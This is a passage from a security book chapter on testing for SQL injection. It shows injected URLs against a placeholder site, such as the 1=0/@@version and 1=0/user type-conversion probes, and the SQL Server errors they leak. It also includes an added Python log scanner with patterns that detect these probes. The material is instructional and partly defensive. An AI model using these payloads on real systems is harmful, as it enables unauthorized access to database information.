Chapter 2 • Testing for SQL Injection
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation
mark before the character string 'attacker;'.
Obviously, you don’t have to memorize every error code. The important thing is that
you understand when and why an error occurs. In both examples, you can assert that the
remote SQL statement running on the database must be something similar to the following:
SELECT *
FROM products
WHERE category='attacker''
The application did not sanitize the single quote, so the database server rejects the
statement as syntactically invalid and returns an error.
You just saw an example of injection into an alphanumeric string. The following example
shows the typical error returned when injecting into a numeric value, which is not enclosed
in quotes in the SQL statement.
Imagine you find a page called showproduct.aspx in the victim.com application.
The script receives a parameter called id and displays a single product depending on the value
of the id parameter:
http://www.victim.com/showproduct.aspx?id=2
When you change the value of the id parameter to something such as the following:
http://www.victim.com/showproduct.aspx?id=attacker
the application returns an error similar to this:
Server Error in '/' Application.
Invalid column name 'attacker'.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Invalid column name
'attacker'.
Based on the error, you can assume that in the first instance the application creates an
SQL statement such as this:
SELECT *
FROM products
WHERE idproduct=2
The preceding statement returns a result set with the product whose idproduct field
equals 2. However, when you inject a non-numeric value, such as attacker, the resultant SQL
statement sent to the database server has the following syntax:
SELECT *
FROM products
WHERE idproduct=attacker
SQL Server treats an unquoted value that is not a number as an identifier, so it assumes the value
must be a column name. In this case, the server looks for a column called attacker within the
products table. However, there is no column named attacker, and therefore it returns an error.
There are some techniques that you can use to retrieve information embedded in the
errors returned from the database. The first one generates an error converting a string to an
integer:
http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/@@version;--
Application response:
Server Error in '/' Application.
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 -
8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft
Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: ) ' to a
column of data type int.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
The database reported an error while converting the result of @@version to an integer, and
the error message disclosed the variable's contents. This technique abuses the implicit type
conversion functionality in SQL Server. We sent 0/@@version as part of our injected code. Because
a division must be performed between two numbers, the database tries to convert the string
returned by @@version into a number. When that conversion fails, the error message includes the
value it could not convert. Note that the value reaches the client only because the application
passes the raw database exception through to the response; an application that returns a generic
error page would still be injectable, but this particular technique would reveal nothing.
You can use this technique to display any variable in the database. The following
example uses this technique to display the user variable:
http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/user;--
Application response:
Syntax error converting the nvarchar value 'dbo' to a column of data type
int.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
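As an added defensive example, not code from the book or from the victim.com application: a small Python scanner over constructed web-server log lines that flags the error-based probes discussed above (a stray single quote, a non-numeric value in the id parameter, and the 0/@@version and 0/user conversion trick). It assumes a six-field W3C-style log layout (date, time, method, uri-stem, uri-query, status) and that id is the only parameter the application expects to be an integer.

```python
import re
from urllib.parse import unquote_plus

# Constructed W3C-style log lines (not from the book): date time method uri-stem uri-query status.
SAMPLE_LOG = """\
2003-01-10 10:01:02 GET /showproducts.aspx category=bikes 200
2003-01-10 10:01:07 GET /showproducts.aspx category=attacker' 500
2003-01-10 10:01:15 GET /showproduct.aspx id=2 200
2003-01-10 10:01:21 GET /showproduct.aspx id=attacker 500
2003-01-10 10:01:30 GET /showproducts.aspx category=bikes'%20and%201=0/@@version;-- 500
2003-01-10 10:01:41 GET /showproducts.aspx category=bikes'%20and%201=0/user;-- 500
"""

# 0/@@version, 0/user: the division forces a string-to-int conversion whose failure echoes the string.
FORCED_CONVERSION = re.compile(r"\b0\s*/\s*(@@\w+|user\b)", re.IGNORECASE)
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application expects to be integers (unquoted in SQL)

def parse_query(query):
    """Decode a raw query string into (name, value) pairs; split on '&' only so ';' stays in values."""
    pairs = []
    for part in query.split("&"):
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def analyze_query(query, numeric_params=NUMERIC_PARAMS):
    """Return (parameter, reason) findings for the error-based probes shown in the text."""
    findings = []
    for name, value in parse_query(query):
        if value.count("'") % 2 == 1:  # stray quote -> "Unclosed quotation mark" error
            findings.append((name, "unbalanced single quote"))
        if name in numeric_params and not re.fullmatch(r"-?\d+", value):
            findings.append((name, "non-numeric value for numeric parameter"))  # "Invalid column name"
        if FORCED_CONVERSION.search(value):
            findings.append((name, "forced type conversion probe"))
    return findings

def scan_log(text):
    """Return (time, uri-stem, status, findings) per flagged line; a 500 means the raw exception likely reached the client."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 6:  # skip anything not in the constructed six-field format
            continue
        _date, time, _method, stem, query, status = fields
        findings = analyze_query(query)
        if findings:
            hits.append((time, stem, int(status), findings))
    return hits
```

A flagged request followed by a 500 response is the pairing to alert on: it means a verbose database error, not a generic error page, was most likely returned to the client.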
There are also techniques to display information about the statement executed by the
database, such as the use of having 1=1:
http://www.victim.com/showproducts.aspx?cat